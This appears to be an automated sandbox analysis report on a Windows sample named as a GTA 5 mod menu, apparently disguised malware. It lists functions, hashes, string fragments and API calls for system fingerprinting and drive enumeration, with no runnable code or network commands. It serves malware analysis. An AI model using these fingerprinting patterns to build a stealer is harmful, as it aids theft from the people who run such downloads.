Opcode Fuzzy Hash: a4a9dc485aa32321631a9ba88ac381a08f4a0956d527d7d86e0b56ac7b8da779
Instruction Fuzzy Hash: F2812773B443054FC318EF6DCD8231AF6D6ABC8310F1A853EA984E7395EAB89C054785

Function 00409BE0 Relevance: 7.6, Strings: 6, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

"W$Q, xrefs: 00409CB5
|K8U, xrefs: 00409CAD
9G3A, xrefs: 00409D0B, 00409D12
pC+M, xrefs: 00409C9D
RS, xrefs: 00409CBD
}OzI, xrefs: 00409CA5

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID: "W$Q$9G3A$RS$pC+M$|K8U$}OzI
API String ID: 0-3685063334
Opcode ID: 96bdf282e63e740944a1609b8ac8317ffb540b32e09e9ccf2b302386b6e0a61f
Instruction ID: eb4d91d3156f656bf2d157b2e035d4208538888ed5a2d7088973be6aa032edce
Opcode Fuzzy Hash: 96bdf282e63e740944a1609b8ac8317ffb540b32e09e9ccf2b302386b6e0a61f
Instruction Fuzzy Hash: 0B319B7675D7180BD318DFA5ACC12ABB656EBC6304F19903CC9D457341DAF859028B89

Function 00422111 Relevance: 5.7, Strings: 4, Instructions: 664
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00422150, 00422191, 00422260, 004222AE, 004227F0, 0042283F
=.B, xrefs: 004221C0
R2B, xrefs: 00422942
, xrefs: 004225D0, 00422618

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID: =.B$R2B$$
API String ID: 0-2815797704
Opcode ID: 75b90a3b4f85d509a2ae3722130fe19e06319d5f6d3282c49123bd1d7350a29e
Instruction ID: 7cd2bbcac7590c6716dd4b2256a7d3fedecacfa041c4029d4c057bdc66e4778b
Opcode Fuzzy Hash: 75b90a3b4f85d509a2ae3722130fe19e06319d5f6d3282c49123bd1d7350a29e
Instruction Fuzzy Hash: D0224335A18611DFD718CF24DC51B6AB3E2FF89311F19897CE485873A1DB78A950CB44

Function 0042BE7C Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 347
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042BF99

Strings

A_, xrefs: 0042BFAD
0(7+, xrefs: 0042C13A

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: 0(7+$A_
API String ID: 3960555810-2536533443
Opcode ID: 60f774cca624d080834627199ca00e1c3705bf244df9c748e2fa3423c9618fd6
Instruction ID: 3c15a2731ec9df5d532ea8724227bf1f71f9f9e92d00e995c7c56334d73fdb8f
Opcode Fuzzy Hash: 60f774cca624d080834627199ca00e1c3705bf244df9c748e2fa3423c9618fd6
Instruction Fuzzy Hash: 40A1E971A0C3918BD335CF25D8903ABBFD1AFDA304F58896ED4C997382C6794906CB56

Function 004328F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 0043293B
GetSystemMetrics.USER32 ref: 0043294A

Strings

, xrefs: 00432A1E

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 4bd733916ec63c2f9a6203a9826a434b0703fda1dc664b3d3d4113c640a0f036
Instruction ID: 1190f5139ee5e2985b26a7f597f1216863c8a1da9097ffc89f262bca0f2c0291
Opcode Fuzzy Hash: 4bd733916ec63c2f9a6203a9826a434b0703fda1dc664b3d3d4113c640a0f036
Instruction Fuzzy Hash: 675173B4D142098FCB40EFACD98569EBBF0BF49310F118529E498E7350D774A945CF96

Function 00426260 Relevance: 4.0, Strings: 3, Instructions: 299COMMON

Download Yara Rule

Strings

i^]j, xrefs: 00426530
#_&+, xrefs: 00426538
x[eh, xrefs: 00426580, 0042658A

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: InitializeThunk
String ID: #_&+$i^]j$x[eh
API String ID: 2994545307-2692929423
Opcode ID: 3cd3a6b2bee4226ec8bf6c0051dac9d8d12e2e8d50b63a711947c241b514037d
Instruction ID: d65bd34988bb7b4adb15161f99bdae07ed86368e1c3f44230ae69dd39fddd604
Opcode Fuzzy Hash: 3cd3a6b2bee4226ec8bf6c0051dac9d8d12e2e8d50b63a711947c241b514037d
Instruction Fuzzy Hash: 71817EB5B143305BD714AA24FC9273B72A6EBD5314F5D843EE98187345EA3CAC01879E

Function 0043D2F7 Relevance: 3.9, Strings: 3, Instructions: 153COMMON

Download Yara Rule

Strings

54+*, xrefs: 0043D306
D]+\, xrefs: 0043D430
D]+\, xrefs: 0043D370

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: InitializeThunk
String ID: 54+*$D]+\$D]+\
API String ID: 2994545307-3648902565
Opcode ID: d151e8d2c18237a71c1e92da42996668e577cda36eb6f4f76096e79221bde7b3
Instruction ID: 076430d849b985c7fb886674556cdf4a35e1a91a73ea2cf47fa32338d3bb83cb
Opcode Fuzzy Hash: d151e8d2c18237a71c1e92da42996668e577cda36eb6f4f76096e79221bde7b3
Instruction Fuzzy Hash: 2E41093AB411119FCB18CB68DC916BF73E2AB9D310F28623EC552A73E5CA7C5C019B59

Function 0043FC30 Relevance: 2.9, Strings: 2, Instructions: 376COMMON

Download Yara Rule

Strings

"!"#, xrefs: 0043FD30
gvwt, xrefs: 0043FEAE

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: InitializeThunk
String ID: "!"#$gvwt
API String ID: 2994545307-1393724390
Opcode ID: cc14641c914d83c1746ebe36b247aa7853d09e1b60199da729c2ff415bda785c
Instruction ID: 100a54b9adf57271f74906b654984dd891f0d04330d0776a6c10bb3f4ef77765
Opcode Fuzzy Hash: cc14641c914d83c1746ebe36b247aa7853d09e1b60199da729c2ff415bda785c
Instruction Fuzzy Hash: C8A17636A183104FD718CE25D88066BB7A3ABD9310F1DD93DE9858B395DA39DC05C786

Function 0043DBCD Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0043DC8D

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 00de8a58601623091de1ddb511819d236fd72ee68c6e052be62c42d3192636a9
Instruction ID: 4f9175ce35c3083a93e9af82ab3bf18242998607a85237f61af41161cf16065f
Opcode Fuzzy Hash: 00de8a58601623091de1ddb511819d236fd72ee68c6e052be62c42d3192636a9
Instruction Fuzzy Hash: 15F0B4AAE189418FD7048F65EC8173737E2A75B205F0854B9D502D73E6DF388806CB1E

Function 0043CF30 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00440370,00000002,00000018,?,?,00000018,?,?,?), ref: 0043CF5E

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0043CFAA Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

54+*, xrefs: 0043CFC4

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID: 54+*
API String ID: 0-1746447996
Opcode ID: ec4ca10cfb400fcbc8912dfccf5f2896a6f19050594e562d19a141d497995b7e
Instruction ID: 7ea4c9c9f6b25cce6cbd6b23a76116404c6ff45e516211294293d193a21c89b4
Opcode Fuzzy Hash: ec4ca10cfb400fcbc8912dfccf5f2896a6f19050594e562d19a141d497995b7e
Instruction Fuzzy Hash: 70213B36E452449FD719CF54DCC2B6E7772AB8E300F28512BD550BB3E2CAB85C019B98

Function 00437960 Relevance: .3, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0608893cc6d712e37cd31bc363bb4072e7a72471fbcc1f0e7a8e95331caccf65
Instruction ID: 6b2d2458c1a3647a0d801ce0296a380f19781d0d32e3f7f323e955e2adea9a0c
Opcode Fuzzy Hash: 0608893cc6d712e37cd31bc363bb4072e7a72471fbcc1f0e7a8e95331caccf65
Instruction Fuzzy Hash: 07815277B083115BD3249F28CC8166BB7E6ABC9314F1D9A3EE9C4D3259D638DC018798

Function 0042B35B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 0042B385
GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042B44B

Strings

#v, xrefs: 0042B385

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID: #v
API String ID: 2904949787-554117064
Opcode ID: 702232d4916de885d8f38087b19d9b3caafa412bcb425aa5952e3dfa16cfaa5d
Instruction ID: 1ba5b36431b5bcdc1af4905024e9bdd09d94c196953bd0fa2893e016a5f5a0a7
Opcode Fuzzy Hash: 702232d4916de885d8f38087b19d9b3caafa412bcb425aa5952e3dfa16cfaa5d
Instruction Fuzzy Hash: F221C17020C3909ADB26CF35A8647FB7BE0EB4B304F8848AED4DAC7292DB354505DB56

Function 0042B359 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 0042B385
GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042B44B

Strings

#v, xrefs: 0042B385

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID: #v
API String ID: 2904949787-554117064
Opcode ID: 6b873924ed13d5cb4503528d9c76a607569f312522b785652d292324da45b8d6
Instruction ID: dea41b85e38e3cae8d20267b98e38e6c9c700ad73d40f47a6a845ef91b2277b9
Opcode Fuzzy Hash: 6b873924ed13d5cb4503528d9c76a607569f312522b785652d292324da45b8d6
Instruction Fuzzy Hash: 5711EE7120C3909BDB29CF35E8687EB7BE4EB8B304F84486ED0CAC6292DB3445059B56

Function 0042B2E2 Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042B44B

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: ea3927b13e452b39a6f2b69043e87f06f88643b9929e2d23ce3bf8c4d79a91d1
Instruction ID: 9bd314025b3b3ef62a8dc0dea97ba74b17d2a7b8940916a7b57aad9051951337
Opcode Fuzzy Hash: ea3927b13e452b39a6f2b69043e87f06f88643b9929e2d23ce3bf8c4d79a91d1
Instruction Fuzzy Hash: F711B27120C3909ADB29CF35A8647FB7BE4EB8B304F84486ED0DBC7281DB3555059B56

Function 00436A21 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 00436A41

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: 082eec1d78f509ef31d3cf197b1d838a71956add6eaf737015400e4656447f6e
Instruction ID: dbe6f92be45b6e644db365ba98387a2b8db1edec6e7d8e009aa07e547563f622
Opcode Fuzzy Hash: 082eec1d78f509ef31d3cf197b1d838a71956add6eaf737015400e4656447f6e
Instruction Fuzzy Hash: 9711EC33E05AA28FC719CA3C8950159BBA26B9A210F19C3EDC866B73D5CA305D11CB90

Function 0043CED0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 610e875d08db9119492dc585ff7113e97d95560b75c2511342cd4b8c56ee8bd0
Instruction ID: 863c5fbee0c7f3df386f553e45eb6441c65696ce7611e36eaf832af42259de93
Opcode Fuzzy Hash: 610e875d08db9119492dc585ff7113e97d95560b75c2511342cd4b8c56ee8bd0
Instruction Fuzzy Hash: 1CE02B36418211EBC2002B257C09B1F3664EFCE710F15087AF400A2155DB3CE80186EF

Function 0042DEDB Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0042DF21

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 591901b9b37ade1a989681dbc93abf8fa580ac5217d21b4560b0abff6cbb82d3
Instruction ID: 608e1ede2ebc3b467fa3772654d36eba2b63007b4de2f6af21c599178e6b5471
Opcode Fuzzy Hash: 591901b9b37ade1a989681dbc93abf8fa580ac5217d21b4560b0abff6cbb82d3
Instruction Fuzzy Hash: 2AF0B7B46097018FE314DF28D56871BBBE1BBC5314F00891DE5998B350C7B59949CF86

Function 00431782 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 004317C6

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: f8db59a5bf91ea8ae1f06f84e5e9cbd01fdb9aa81b23c880af4633124e8c83b1
Instruction ID: 041be1bada5abe7387cf79b1710c976d2a82e00eac2282a2b14f717ddb5291f4
Opcode Fuzzy Hash: f8db59a5bf91ea8ae1f06f84e5e9cbd01fdb9aa81b23c880af4633124e8c83b1
Instruction Fuzzy Hash: 8CF074B450D3428FE314DF68C5A871BBBE1BB85348F40891CE4958B390C7B69648CF82

Function 0043B230 Relevance: 1.5, APIs: 1, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,00414704,?), ref: 0043B251

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 8b9904cbeb18d93210e43c4a1b0d4448102e67cfa60bdd9c4f9da902e19d558f
Instruction ID: 24dbd1474c357ea6abca065723ce719fa199d3eadc188d416c92d3265e936af3
Opcode Fuzzy Hash: 8b9904cbeb18d93210e43c4a1b0d4448102e67cfa60bdd9c4f9da902e19d558f
Instruction Fuzzy Hash: FCD01731809122FFC6112B65BC02B8A3664AF4E361F0A48AAE1045A0B1DB39CC41CE99

Function 0040C750 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C763

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 235490dd7c0a20c242dffb008bb297edb8fcc1c2205090b3853fd5e35335a6ab
Instruction ID: 35a066782ec2156b7277d96b6bb1445f52de54372100dfdc21345d2ec2160b87
Opcode Fuzzy Hash: 235490dd7c0a20c242dffb008bb297edb8fcc1c2205090b3853fd5e35335a6ab
Instruction Fuzzy Hash: 8AD0A7755501447BD214675CEC07F66776CE783715F800235F362C76D1DD90B910D569

Function 0040C783 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C795

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: d3b2f6c4895501b5ab91bf7567167118f94e3793d29a38ce57797f27848e64f4
Instruction ID: 8c43644f0df65177ff6421f4d7acf314187a5d0075bbea538e80a61589bc0ee9
Opcode Fuzzy Hash: d3b2f6c4895501b5ab91bf7567167118f94e3793d29a38ce57797f27848e64f4
Instruction Fuzzy Hash: 57D0C934BD43417AF1A49B08ED57F1032549782F15F300224B362FE2E0C9D0B100860D

Function 0043B210 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,0040893A,1110049E), ref: 0043B220

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 127d7021a0357c8a87d4216beb14fd6cfe9d5466f4785d17cdcf8522e32ecd31
Instruction ID: 2146790a7e07a7bcd61b284ea10af0aaa1ee16b8a37b50a64afb627c168019b4
Opcode Fuzzy Hash: 127d7021a0357c8a87d4216beb14fd6cfe9d5466f4785d17cdcf8522e32ecd31
Instruction Fuzzy Hash: 67C09B31445120BBC5102B16FC49FC67F58DF45351F154495B005670B2C770EC41CED9

Non-executed Functions

Function 00419440 Relevance: 20.5, APIs: 2, Strings: 9, Instructions: 1236COMMON

Download Yara Rule

APIs

Part of subcall function 0043CF30: LdrInitializeThunk.NTDLL(00440370,00000002,00000018,?,?,00000018,?,?,?), ref: 0043CF5E

FreeLibrary.KERNEL32(?), ref: 004199F6
FreeLibrary.KERNEL32(?), ref: 00419A6B

Strings

#v, xrefs: 004199F6, 00419A6B
RS, xrefs: 004197CD
2C%], xrefs: 004197AD
l[(U, xrefs: 004197BD
, xrefs: 0041955E
m_jY, xrefs: 004197B5
"W$Q, xrefs: 004197C5
, xrefs: 0041A1D4
, xrefs: 00419925

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: "W$Q$2C%]$RS$l[(U$m_jY$#v$$$
API String ID: 764372645-995325495
Opcode ID: 0b4af268c1ba0121ecaff419ed3874ba7e5de519abce5e40b5fb68b92a7fd73e
Instruction ID: aa92527347dc5268acee257bbf81cf0051288069bbbb3ca843c98ffa2b397c74
Opcode Fuzzy Hash: 0b4af268c1ba0121ecaff419ed3874ba7e5de519abce5e40b5fb68b92a7fd73e
Instruction Fuzzy Hash: 0F825675619340AFD724CB25CC9176BBBE2ABD9350F28882EE0C587365D638DC81CF5A

Function 00427449 Relevance: 16.1, APIs: 2, Strings: 7, Instructions: 346COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00427579
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004275E4

Strings

KyB, xrefs: 004276B5, 00427945, 00427993
iv, xrefs: 00427503
"vB, xrefs: 00427466
X2g0, xrefs: 00427542, 004278F0
CxB, xrefs: 0042783D
hxB, xrefs: 00427862
"vB, xrefs: 00427609

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: "vB$"vB$CxB$KyB$X2g0$hxB$iv
API String ID: 237503144-3246612585
Opcode ID: cb4b1db522b94e1775afdc64a30cf746190210310ee6f99ab70d9afc9d1cb643
Instruction ID: ed78c50a7d9866ee9609980896a38891c50be3bdd8bce2317c83d1d0d4c56717
Opcode Fuzzy Hash: cb4b1db522b94e1775afdc64a30cf746190210310ee6f99ab70d9afc9d1cb643
Instruction Fuzzy Hash: 38C1FEB5A08310DFD3108F18E84071BBBE1EBCA714F55892DE989A7391D775E905CB8B

Function 00427472 Relevance: 16.1, APIs: 2, Strings: 7, Instructions: 317COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00427579
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004275E4

Strings

KyB, xrefs: 004276B5, 00427945
iv, xrefs: 00427503
"vB, xrefs: 00427466
X2g0, xrefs: 00427542, 004278F0
CxB, xrefs: 0042783D
hxB, xrefs: 00427862
"vB, xrefs: 00427609

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: "vB$"vB$CxB$KyB$X2g0$hxB$iv
API String ID: 237503144-3246612585
Opcode ID: a5c86de6f952cb508fd514bbfaf09dbd82464d2154d7ceed3f2259b202b922fb
Instruction ID: 932d1ddd98badc50e75d153df181333331b17d65aff21f083f25902d6f1b28a1
Opcode Fuzzy Hash: a5c86de6f952cb508fd514bbfaf09dbd82464d2154d7ceed3f2259b202b922fb
Instruction Fuzzy Hash: 39B1FEB5608350CFD3108F28E88071BBBE0EBCA704F55892DE985AB391D7B5D905CB8B

Function 004238EB Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 320COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 00423696

Strings

y, xrefs: 00423477
45, xrefs: 00423A9A
t2, xrefs: 00423467
pv, xrefs: 00423580
HN, xrefs: 004235F0
tz, xrefs: 00423588

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: DrivesLogical
String ID: 45$t2$y$HN$pv$tz
API String ID: 999431828-2429670011
Opcode ID: f3006ca9c235a2daedc199195299cd5de7b800c7cf450bd34368201b09023e7e
Instruction ID: 5a73697db411ee13797b79c9f647b4784aec8b81d6339e9191e827630310b4ff
Opcode Fuzzy Hash: f3006ca9c235a2daedc199195299cd5de7b800c7cf450bd34368201b09023e7e
Instruction Fuzzy Hash: 2FB174B0609380DFD700EF15E88166BBBF1EB86748F50992DE1D59B211E3789A46CB4B

Function 00432280 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 121clipboardCOMMON

Download Yara Rule

APIs

